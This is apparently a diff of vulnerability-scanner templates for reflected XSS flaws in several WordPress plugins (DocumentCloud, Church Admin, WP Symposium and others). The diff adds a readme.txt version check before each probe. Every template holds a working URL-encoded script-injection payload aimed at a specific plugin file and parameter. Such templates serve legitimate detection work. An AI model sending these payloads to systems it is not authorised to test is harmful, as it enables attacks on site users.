tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Navis'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -30,7 +30,20 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project
|
tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Church Admin ='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -27,7 +27,23 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project
|
tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'SourceAfrica'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
case-insensitive: true
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -31,7 +31,22 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/wp-symposium"
|
google-query: inurl:"/wp-content/plugins/wp-symposium"
|
||||||
tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro
|
tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'WP Symposium'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -31,7 +31,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/admin-font-editor"
|
google-query: inurl:"/wp-content/plugins/admin-font-editor"
|
||||||
tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project
|
tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Admin Font Editor'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -29,7 +29,20 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project
|
tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Ajax Random Post'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -27,7 +27,22 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/anti-plagiarism"
|
google-query: inurl:"/wp-content/plugins/anti-plagiarism"
|
||||||
tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project
|
tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'anti plagiarism'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|